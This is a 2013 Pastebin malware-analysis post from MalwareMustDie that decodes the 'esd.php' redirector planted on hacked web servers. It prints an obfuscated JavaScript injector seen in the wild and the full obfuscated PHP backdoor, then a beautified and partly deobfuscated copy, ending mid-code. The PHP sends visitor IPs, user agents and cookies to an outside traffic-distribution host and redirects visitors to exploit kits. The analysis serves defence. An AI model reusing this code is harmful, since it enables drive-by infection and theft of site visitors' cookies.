SHARE
TWEET

#ESD.PHP REDIRECTOR UNLEASHED | Server Side's Code

MalwareMustDie Oct 5th, 2013 1,076 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###################################################################################
  2. # MalwareMustDie, NPO | Malware Decode Draft | http://malwaremustdie.org
  3. # Subject: ESD.PHP REDIRECTOR UNLEASHED | Server Side's Evil Code
  4. # The Guide for: Decoding, Reversing, Understanding attack steps for Mitigation.
  5. # Source: something like ending w/***/esd.php
  6. # Cracked by: @unixfreaxjp ~]$ date;uname
  7. Sun Oct  6 21:35:57 JST 2013
  8. FreeBSD
  9. ###################################################################################
  10.  
  11. # Note:
  12. I am so sorry.. really do trying to write this in MalwareMustDie Blog, but my eyes I guess are not recovered well,
  13. today's got burns like crazy after making decoding draft level (this) .. so pls forgive me for
  14. my decode-draft only that I can share to you in this weekend "crusade".
  15. Thank's for @kafeine for the grabs, to @wopot for PHP codes discussion, and to all MMD folks, you are all rocks.
  16.  
  17. # Words of wise:
  18. Some "people" saying we're in MalwareMustDie (MMD) are dreamin' way to high to believe of internet
  19. free of malware, as per invented.
  20. I'd say, that people have liberty to speak. as I have liberty to believe what I want to believe,
  21. I ain't gonna judge other's thought and will f*ing die trying to achieve what I believe dearly,
  22. & THAT is none of "those people's" business.
  23.  
  24. This work is ONLY for them who believes.. #MalwareMUSTDie!  
  25.  
  26. #========================
  27. # PROLOGUE
  28. #========================
  29.  
  30. ESD.PHP or whatever the name used, is spotted in used to redirect
  31. users into malicious sites upon condition meets, by the PHP command.
  32. After penetrating the compromised Web Server w/PHP support, this threat-
  33. can be applied in various OS's web server.
  34. Is a legend already since we saw this attach from Early 2013, yet
  35. still so many sites are ACTIVE TODAY and infecting you to many
  36. Exploit Kit sites for the further malware infection.
  37.  
  38. #==========================================
  39. # Sample of ESD.PHP Attack, the front end:
  40. #==========================================
  41.  
  42. // ESD.PHP front attack were found ITW with the javascript obfuscation like below:
  43. // which are implented in various hacked sites..
  44.  
  45. <s c r i p t type="text/javascript" language="javascript" > try{window.document.body++}catch(gdsgsdg){dbshre=57;}
  46. if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eva
  47. l;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,11
  48. 1,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,1
  49. 01,94,33,36,50,5,3,7,5,23,24,25,26,111,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,96,103,38,110,109,9
  50. 6,103,39,93,106,100,39,94,109,95,37,104,97,106,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,103,103,10
  51. 8,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,110,41,106,108,114,102,96
  52. ,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,107,38,108,110,116,99,93,39,98,96,96,95,97,110
  53. ,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,111,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,1
  54. 05,114,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,2
  55. 4,25,26,111,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,3
  56. 1,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,32,24,11
  57. 6,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,9
  58. 1,53,85,33,111,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111
  59. ,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,37,89,105,106,96,101,92,60,98,100,99,92,3
  60. 3,110,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-440!=0;i++){if((020==0x10)&&window.docum
  61. ent)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</s c r i p t>
  62.  
  63. // And after deobfuscation you'll fine an IFRAME linked to esd.php like below:
  64. // Of course with the various modification and combination
  65.  
  66. function ()
  67.      {
  68.        var id = '6';
  69.        var kf09 = document.createElement('iframe');
  70.        kf09.src = 'http://fugafuga/esd.php';
  71.        kf09.style.position = 'absolute';
  72.        kf09.style.border = '1';
  73.        kf09.style.height = '31px';
  74.        kf09.style.width = '42px';
  75.        kf09.style.left = '500px';
  76.        kf09.style.top = '100px';
  77.        if (!document.getElementById('kf'))
  78.        {
  79.        document.write('<style>body{overflow-x:hidden;}</style>');
  80.          document.write('<div id=\'kf\' style="position:absolute; width:80%; height:100%;" ></div>');
  81.          document.getElementById('kf').appendChild(kf09);
  82.        }
  83.  
  84. function () {
  85.                 var k = document.createElement('iframe');
  86.                 k.src = 'http://hogehoge/esd.php';
  87.                 k.style.position = 'absolute';
  88.                 k.style.border = '0';
  89.                 k.style.height = '1px';
  90.                 k.style.width = '1px';
  91.                 k.style.left = '1px';
  92.                 k.style.top = '1px';
  93.                 if (!document.getElementById('k')) {
  94.                 document.write('<div id=\'k\'></div>');
  95.                 document.getElementById('k').appendChild(k);
  96.         }
  97.  
  98. #==========================================
  99. # ESD.PHP Attack, the server side:
  100. #==========================================
  101.  
  102. It is hard just to guess what happen in the server side code by seeing the client side code only,
  103. since the client side code was designed to not expose much of the server side's work.
  104. The server side code is actually a simple & interactive malicious tool tha allowes you to
  105. configure the attack parameters, to save the configuration you make and to be executed as an
  106. attack.
  107.  
  108. Mean while, upon the attack executed, depend on the flags it will look for the direct
  109. redirection, 302 redirections, or setting up the cookie as the delay/cushion of the next
  110. visit of the users.
  111.  
  112. So in this writing I will expose the decode & reverse the server side code of ESD.PHP.
  113. With suggesting some points to mitigate the attack.
  114.  
  115. #==========================================
  116. # The below analysis of code explains:
  117. #==========================================
  118.  
  119. 1. To know the attack structure is.
  120. 2. To understand the mitigation point
  121. 3. Understanding the importance to share #PoC like this to comprehend the threat into
  122.    user's level for prevention.
  123.  
  124. #=========================================
  125. # ORIGINAL ESD.PHP SERVER SIDE CODE
  126. #=========================================
  127.  
  128. <?$cfg='vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00='; ?>
  129.  
  130. <? function _536298672($i){$a=Array('a0xRYzhZMmc=','UkRycQ==','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_536298672(0);function string_cpt($String,$Password){$Salt=_536298672(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_536298672(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_536298672(3),sha1($Gamma .$Seq .$Salt));$Gamma.=substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_536298672(4)];if($mode== _536298672(5)AND $c[_536298672(6)]==$_REQUEST[_536298672(7)]){echo _536298672(8) .$_REQUEST[_536298672(9)] ._536298672(10) .$c[_536298672(11)] ._536298672(12) .$c[_536298672(13)] ._536298672(14) .$c[_536298672(15)] ._536298672(16) .$c[_536298672(17)] ._536298672(18) .$c[_536298672(19)] ._536298672(20);die();}if($mode== _536298672(21)AND $c[_536298672(22)]==$_REQUEST[_536298672(23)]){$sn=explode(_536298672(24),$_SERVER[_536298672(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i==0){$c[_536298672(26)]=$_POST[_536298672(27)];$c[_536298672(28)]=$_POST[_536298672(29)];$c[_536298672(30)]=$_POST[_536298672(31)];$c[_536298672(32)]=$_POST[_536298672(33)];$c[_536298672(34)]=$_POST[_536298672(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_536298672(36));if(fputs($fp,implode(_536298672(37),$file)))die(_536298672(38));fclose($fp);}if($mode== _536298672(39)AND $c[_536298672(40)]==$_REQUEST[_536298672(41)]){chmod(_536298672(42),$_SERVER[_536298672(43)]);if(unlink($_SERVER[_536298672(44)]))die(_536298672(45));}$dom=explode(_536298672(46),$c[_536298672(47)]);$dom=$dom[2];$dhost=$dom;if($c[_536298672(48)]){$dom=$c[_536298672(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_536298672(50) .$_SERVER[_536298672(51)] .$_SERVER[_536298672(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_536298672(53)]);$t_prox=_536298672(54);if($_SERVER[_536298672(55)]){$t_prox=_536298672(56);}$t_agent=urlencode($_SERVER[_536298672(57)]);foreach($_COOKIE as $c[_536298672(58)]=>$val){$t_cookie=$t_cookie ._536298672(59) .$c[_536298672(60)] ._536298672(61) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_536298672(62)]);}$out=_536298672(63) .$c[_536298672(64)] ._536298672(65) .$t_dom ._536298672(66) .$t_ref ._536298672(67) .$t_ip ._536298672(68) .$t_prox ._536298672(69) .$t_agent ._536298672(70) .$t_cookie ._536298672(71) .$c[_536298672(72)] ._536298672(73);$out .= _536298672(74) .$dhost ._536298672(75);$out .= _536298672(76);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch.=$str;if($str== _536298672(77)&& empty($he)){$he=_536298672(78);}if($he== _536298672(79)){$goto.=$str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_536298672(80),$ch);if($res){$goto=$c[_536298672(81)];}if($ch[1]== _536298672(82)){}else{$goto=$c[_536298672(83)];}$gotoe=explode(_536298672(84),$goto);If($gotoe[0]== _536298672(85)){header(_536298672(86));header(_536298672(87) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _536298672(88)){$gotoee=explode(_536298672(89),$goto_body);foreach($gotoee as $setcook){$set=explode(_536298672(90),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _536298672(91)){echo $goto_body;} ?>
  131.  
  132. #========================
  133. # BEAUTIFIED CODE
  134. #========================
  135. //----------------------------
  136. // (Noted some base64 hashes was cut during the process..just read through it)
  137. //----------------------------
  138.  
  139. $cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';
  140.  
  141. function _536298672($i)
  142.   {
  143.     $a = Array(
  144.         'a0xRYzhZMmc=',
  145.         'UkRycQ==',
  146.         '',
  147.         'SCo=',
  148.         'bW9kZQ==',
  149.         'Y29uZmln',
  150.         'a2V5',
  151.         'a2V5',
  152.         'PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9',
  153.         'a2V5',
  154.         'PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i',
  155.         'dXJs',
  156.         'Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=',
  157.         'aXA=',
  158.         'Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=',
  159.         'a2V5',
  160.         'Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=',
  161.         'bGlu',
  162.         'Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==',
  163.         'aWQ=',
  164.         'Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==',
  165.         'c2V0Y29uZmln',
  166.         'a2V5',
  167.         'a2V5',
  168.         'Lw==',
  169.         'U0NSSVBUX05BTUU=',
  170.         'dXJs',
  171.         'cHRkcw==',
  172.         'aXA=',
  173.         'cHRkc2lw',
  174.         'bGlu',
  175.         'cHRv',
  176.         'aWQ=',
  177.         'cGVzZGlk',
  178.         'a2V5',
  179.         'cGtleQ==',
  180.         'dw==',
  181.         '',
  182.         'U2F2ZWQuCg==',
  183.         'a2lsbA==',
  184.         'a2V5',
  185.         'a2V5',
  186.         'Nzc3',
  187.         'U0NSSVBUX0ZJTEVOQU1F',
  188.         'U0NSSVBUX0ZJTEVOQU1F',
  189.         'b2sK',
  190.         'Lw==',
  191.         'dXJs',
  192.         'aXA=',
  193.         'aXA=',
  194.         'aHR0cDovLw==',
  195.         'SFRUUF9IT1NU',
  196.         'U0NSSVBUX05BTUU=',
  197.         'UkVNT1RFX0FERFI=',
  198.         'bm8=',
  199.         'SFRUUF9YX0ZPUldBUkRFRF9GT1I=',
  200.         'eWVz',
  201.         'SFRUUF9VU0VSX0FHRU5U',
  202.         'a2V5',
  203.         'Jg==',
  204.         'a2V5',
  205.         'PQ==',
  206.         'UVVFUllfU1RSSU5H',
  207.         'R0VUIA==',
  208.         'dXJs',
  209.         'P2RvbT0=',
  210.         'JnJlZj0=',
  211.         'JmlwPQ==',
  212.         'JnByb3g9',
  213.         'JmFnZW50PQ==',
  214.         'JmNvb2tpZT0=',
  215.         'JmVzZGlkPQ==',
  216.         'aWQ=',
  217.         'IEhUVFAvMS4wDQo=',
  218.         'SG9zdDog',
  219.         'DQo=',
  220.         'Q29ubmVjdGlvbjogQ2xvc2UNCg0K',
  221.         'DQo=',
  222.         'ZG8=',
  223.         'ZG8=',
  224.         'IA==',
  225.         'bGlu',
  226.         'MjAw',
  227.         'bGlu',
  228.         'Oi8v',
  229.         'aHR0cA==',
  230.         'SFRUUC8xLjEgMzAyIEZvdW5k',
  231.         'TG9jYXRpb246IA==',
  232.         'Y29vaw==',
  233.         'Jg==',
  234.         'PQ==',
  235.         'ZWNobw=='
  236.     );
  237.     return base64_decode($a[$i]);
  238.   }
  239.  
  240. error_reporting(0);
  241. $key = _536298672(0);
  242. function string_cpt($String, $Password)
  243.   {
  244.     $Salt   = _536298672(1);
  245.     $StrLen = strlen($String);
  246.     $Seq    = $Password;
  247.     $Gamma  = _536298672(2);
  248.     while (strlen($Gamma) < $StrLen)
  249.       {
  250.         $Seq = pack(_536298672(3), sha1($Gamma . $Seq . $Salt));
  251.         $Gamma .= substr($Seq, 0, 8);
  252.       }
  253.     return $String ^ $Gamma;
  254.   }
  255.  
  256. $c    = unserialize(string_cpt(base64_decode($cfg), $key));
  257. $mode = $_REQUEST[_536298672(4)];
  258.  
  259. if ($mode == _536298672(5) AND $c[_536298672(6)] == $_REQUEST[_536298672(7)])
  260.   {
  261.     echo _536298672(8) . $_REQUEST[_536298672(9)] . _536298672(10) . $c[_536298672(11)] . _536298672(12) . $c[_536298672(13)] . _536298672(14) . $c[_536298672(15)] . _536298672(16) . $c[_536298672(17)] . _536298672(18) . $c[_536298672(19)] . _536298672(20);
  262.     die();
  263.   }
  264.  
  265. if ($mode == _536298672(21) AND $c[_536298672(22)] == $_REQUEST[_536298672(23)])
  266.   {
  267.     $sn = explode(_536298672(24), $_SERVER[_536298672(25)]);
  268.     foreach ($sn as $snn)
  269.       {
  270.         $scr = $snn;
  271.       }
  272.     $getlpa = file($scr);
  273.     $strng  = $getlpa[0];
  274.     $file   = file($scr);
  275.     for ($i = 0; $i < sizeof($file); $i++)
  276.         if ($i == 0)
  277.           {
  278.             $c[_536298672(26)] = $_POST[_536298672(27)];
  279.             $c[_536298672(28)] = $_POST[_536298672(29)];
  280.             $c[_536298672(30)] = $_POST[_536298672(31)];
  281.             $c[_536298672(32)] = $_POST[_536298672(33)];
  282.             $c[_536298672(34)] = $_POST[_536298672(35)];
  283.             $cfg               = base64_encode(string_cpt(serialize($c), $key));
  284.             $file[$i]          = "<?\$cfg='$cfg'; ?>\n";
  285.           }
  286.     $fp = fopen($scr, _536298672(36));
  287.     if (fputs($fp, implode(_536298672(37), $file)))
  288.         die(_536298672(38));
  289.     fclose($fp);
  290.   }
  291. if ($mode == _536298672(39) AND $c[_536298672(40)] == $_REQUEST[_536298672(41)])
  292.   {
  293.     chmod(_536298672(42), $_SERVER[_536298672(43)]);
  294.     if (unlink($_SERVER[_536298672(44)]))
  295.         die(_536298672(45));
  296.   }
  297. $dom   = explode(_536298672(46), $c[_536298672(47)]);
  298. $dom   = $dom[2];
  299. $dhost = $dom;
  300. if ($c[_536298672(48)])
  301.   {
  302.     $dom = $c[_536298672(49)];
  303.   }
  304. $fp = fsockopen($dom, 80, $errno, $errstr, 2);
  305. if (!$fp)
  306.   {
  307.     $res = 1;
  308.   }
  309. else
  310.   {
  311.     $t_dom  = urlencode(_536298672(50) . $_SERVER[_536298672(51)] . $_SERVER[_536298672(52)]);
  312.     $t_ref  = urlencode($_SERVER[HTTP_REFERER]);
  313.     $t_ip   = urlencode($_SERVER[_536298672(53)]);
  314.     $t_prox = _536298672(54);
  315.     if ($_SERVER[_536298672(55)])
  316.       {
  317.         $t_prox = _536298672(56);
  318.       }
  319.     $t_agent = urlencode($_SERVER[_536298672(57)]);
  320.     foreach ($_COOKIE as $c[_536298672(58)] => $val)
  321.       {
  322.         $t_cookie = $t_cookie . _536298672(59) . $c[_536298672(60)] . _536298672(61) . $val;
  323.       }
  324.     $t_cookie = urlencode($t_cookie);
  325.     if (empty($t_cookie))
  326.       {
  327.         $t_cookie = urlencode($_SERVER[_536298672(62)]);
  328.       }
  329.     $out = _536298672(63) . $c[_536298672(64)] . _536298672(65) . $t_dom . _536298672(66) . $t_ref . _536298672(67) . $t_ip . _536298672(68) . $t_prox . _536298672(69) . $t_agent . _536298672(70) . $t_cookie . _536298672(71) . $c[_536298672(72)] . _536298672(73);
  330.     $out .= _536298672(74) . $dhost . _536298672(75);
  331.     $out .= _536298672(76);
  332.     fwrite($fp, $out);
  333.     while (!feof($fp))
  334.       {
  335.         $str = fgets($fp, 128);
  336.         $ch .= $str;
  337.         if ($str == _536298672(77) && empty($he))
  338.           {
  339.             $he = _536298672(78);
  340.           }
  341.         if ($he == _536298672(79))
  342.           {
  343.             $goto .= $str;
  344.           }
  345.       }
  346.     fclose($fp);
  347.   }
  348. $goto = substr($goto, 2);
  349. $ch   = explode(_536298672(80), $ch);
  350. if ($res)
  351.   {
  352.     $goto = $c[_536298672(81)];
  353.   }
  354. if ($ch[1] == _536298672(82))
  355.   {
  356.   }
  357. else
  358.   {
  359.     $goto = $c[_536298672(83)];
  360.   }
  361. $gotoe = explode(_536298672(84), $goto);
  362. If ($gotoe[0] == _536298672(85))
  363.   {
  364.     header(_536298672(86));
  365.     header(_536298672(87) . $goto);
  366.   }
  367. $goto_body = substr($goto, 7);
  368. If ($gotoe[0] == _536298672(88))
  369.   {
  370.     $gotoee = explode(_536298672(89), $goto_body);
  371.     foreach ($gotoee as $setcook)
  372.       {
  373.         $set = explode(_536298672(90), $setcook);
  374.         setcookie($set[0], $set[1]);
  375.       }
  376.   }
  377. If ($gotoe[0] == _536298672(91))
  378.   {
  379.     echo $goto_body;
  380.   }
  381.  
  382. #========================
  383. # CRACKING TABLE
  384. #========================
  385. // What Are we going to do is extract the top arrays of base64 into the strings
  386. // As a table to be substituted into the real values...
  387. -------------------------------------------------------------------------
  388. base64                                 Strings
  389. -------------------------------------------------------------------------
  390. a0xRYzhZMmc=                           kLQc8Y2g
  391. UkRycQ==                               RDrq
  392. (null)                                 (null)
  393. SCo=                                   H*
  394. bW9kZQ==                               mode
  395. Y29uZmln                               config
  396. a2V5                                   key
  397. a2V5                                   key
  398. PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZ      <form name="form1" metho[...]
  399. a2V5                                   key
  400. PjxwcmU+ClREUzogICAgIDxpbnB1dCB0e      ><pre>TDS:     <input t[...]
  401. dXJs                                   url
  402. Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlP      ">  TDS IP:  <input type[...]
  403. aXA=                                   ip
  404. Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9I      ">KEY:     <input type=[...]
  405. a2V5                                   key
  406. Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlP      ">  Reserve: <input type[...]
  407. bGlu                                   lin
  408. Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9I      ">ID:      <input type=[...]
  409. aWQ=                                   id
  410. Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiI      ">  <input type="submit"[...]
  411. c2V0Y29uZmln                           setconfig
  412. a2V5                                   key
  413. a2V5                                   key
  414. Lw==                                   /
  415. U0NSSVBUX05BTUU=                       SCRIPT_NAME
  416. dXJs                                   url
  417. cHRkcw==                               ptds
  418. aXA=                                   ip
  419. cHRkc2lw                               ptdsip
  420. bGlu                                   lin
  421. cHRv                                   pto
  422. aWQ=                                   id
  423. cGVzZGlk                               pesdid
  424. a2V5                                   key
  425. cGtleQ==                               pkey
  426. dw==                                   w
  427.                                        
  428. U2F2ZWQuCg==                           Saved.
  429. a2lsbA==                               kill
  430. a2V5                                   key
  431. a2V5                                   key
  432. Nzc3                                   777
  433. U0NSSVBUX0ZJTEVOQU1F                   SCRIPT_FILENAME
  434. U0NSSVBUX0ZJTEVOQU1F                   SCRIPT_FILENAME
  435. b2sK                                   ok
  436. Lw==                                   /
  437. dXJs                                   url
  438. aXA=                                   ip
  439. aXA=                                   ip
  440. aHR0cDovLw==                           http://
  441. SFRUUF9IT1NU                           HTTP_HOST
  442. U0NSSVBUX05BTUU=                       SCRIPT_NAME
  443. UkVNT1RFX0FERFI=                       REMOTE_ADDR
  444. bm8=                                   no
  445. SFRUUF9YX0ZPUldBUkRFRF9GT1I=           HTTP_X_FORWARDED_FOR
  446. eWVz                                   yes
  447. SFRUUF9VU0VSX0FHRU5U                   HTTP_USER_AGENT
  448. a2V5                                   key
  449. Jg==                                   &
  450. a2V5                                   key
  451. PQ==                                   =
  452. UVVFUllfU1RSSU5H                       QUERY_STRING
  453. R0VUIA==                               GET
  454. dXJs                                   url
  455. P2RvbT0=                               ?dom=
  456. JnJlZj0=                               &ref=
  457. JmlwPQ==                               &ip=
  458. JnByb3g9                               &prox=
  459. JmFnZW50PQ==                           &agent=
  460. JmNvb2tpZT0=                           &cookie=
  461. JmVzZGlkPQ==                           &esdid=
  462. aWQ=                                   id
  463. IEhUVFAvMS4wDQo=                        HTTP/1.0
  464. SG9zdDog                               Host:
  465. DQo=                                   (null)
  466. Q29ubmVjdGlvbjogQ2xvc2UNCg0K           Connection: Close
  467. DQo=                                   (null)
  468. ZG8=                                   do
  469. ZG8=                                   do
  470. IA==                                   (SPACE)
  471. bGlu                                   lin
  472. MjAw                                   200
  473. bGlu                                   lin
  474. Oi8v                                   ://
  475. aHR0cA==                               http
  476. SFRUUC8xLjEgMzAyIEZvdW5k               HTTP/1.1 302 Found
  477. TG9jYXRpb246IA==                       Location:
  478. Y29vaw==                               cook
  479. Jg==                                   &
  480. PQ==                                   =
  481. ZWNobw==                               echo                              
  482.  
  483. #========================
  484. # MANUAL SUBSTITUTION
  485. #========================
  486. // Now let's put those values one by one...
  487. // FYI: I did it manually by a text editor, in two windows popped up and took me about 20minutes.
  488.  
  489. <?php
  490.  
  491. $cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';
  492.  
  493. error_reporting(0);
  494. $key = 'kLQc8Y2g';
  495. function string_cpt($String, $Password)
  496.   {
  497.     $Salt   = 'RDrq';
  498.     $StrLen = strlen($String);
  499.     $Seq    = $Password;
  500.     $Gamma  = '';
  501.     while (strlen($Gamma) < $StrLen)
  502.       {
  503.         $Seq = pack('H*', sha1($Gamma . $Seq . $Salt));
  504.         $Gamma .= substr($Seq, 0, 8);
  505.       }
  506.     return $String ^ $Gamma;
  507.   }
  508.  
  509. $c    = unserialize(string_cpt(base64_decode($cfg), $key));
  510.  
  511. $mode = $_REQUEST['mode'];
  512. if ($mode == 'config' AND $c['key'] == $_REQUEST['key']) {
  513.     echo '<form name="form1" method="post" action=?mode=setconfig&key=' . $_REQUEST['key'] . '><pre>
  514. TDS:     <input type="text" name="ptds" value="' . $c['url'] . '">  TDS IP:  <input type="text" name="ptdsip" value="' . $c['ip'] . '">
  515. KEY:     <input type="text" name="pkey" value="' . $c['key'] . '">  Reserve: <input type="text" name="pto" value="' . $c['lin'] . '">
  516. ID:      <input type="text" name="pesdid" value="' . $c['id'] . '">  <input type="submit" name="Submit" value="ok"></pre>
  517. </form>';
  518.     die();
  519.   }
  520.  
  521. if ($mode == 'setconfig' AND $c['key'] == $_REQUEST['key']) {
  522.     $sn = explode('/', $_SERVER['SCRIPT_NAME']);
  523.     foreach ($sn as $snn) {
  524.         $scr = $snn;
  525.     }
  526.     $getlpa = file($scr);
  527.     $strng  = $getlpa[0];
  528.     $file   = file($scr);
  529.     for ($i = 0; $i < sizeof($file); $i++)
  530.         if ($i == 0) {
  531.             $c['url'] = $_POST['ptds'];
  532.             $c['ip'] = $_POST['ptdsip'];
  533.             $c['lin'] = $_POST['pto'];
  534.             $c['id'] = $_POST['pesdid'];
  535.             $c['key'] = $_POST['pkey'];
  536.             $cfg                = base64_encode(string_cpt(serialize($c), $key));
  537.             $file[$i]           = "<?\$cfg='$cfg'; ?>\n";
  538.         }
  539.     $fp = fopen($scr, 'w');
  540.     if (fputs($fp, implode('', $file)))
  541.         die('Saved.');
  542.     fclose($fp);
  543.   }
  544.  
  545. if ($mode == "killswitch" AND $c[key] == $_REQUEST[key])
  546.   {
  547.     chmod('777', $_SERVER['SCRIPT_FILENAME']);
  548.     if (unlink($_SERVER['SCRIPT_FILENAME']))
  549.         die('ok');
  550.   }
  551. $dom   = explode('/', $c['url']);
  552. $dom   = $dom[2];
  553. $dhost = $dom;
  554. if ($c['ip'])
  555.   {
  556.     $dom = $c['ip'];
  557.   }
  558. $fp = fsockopen($dom, 80, $errno, $errstr, 2);
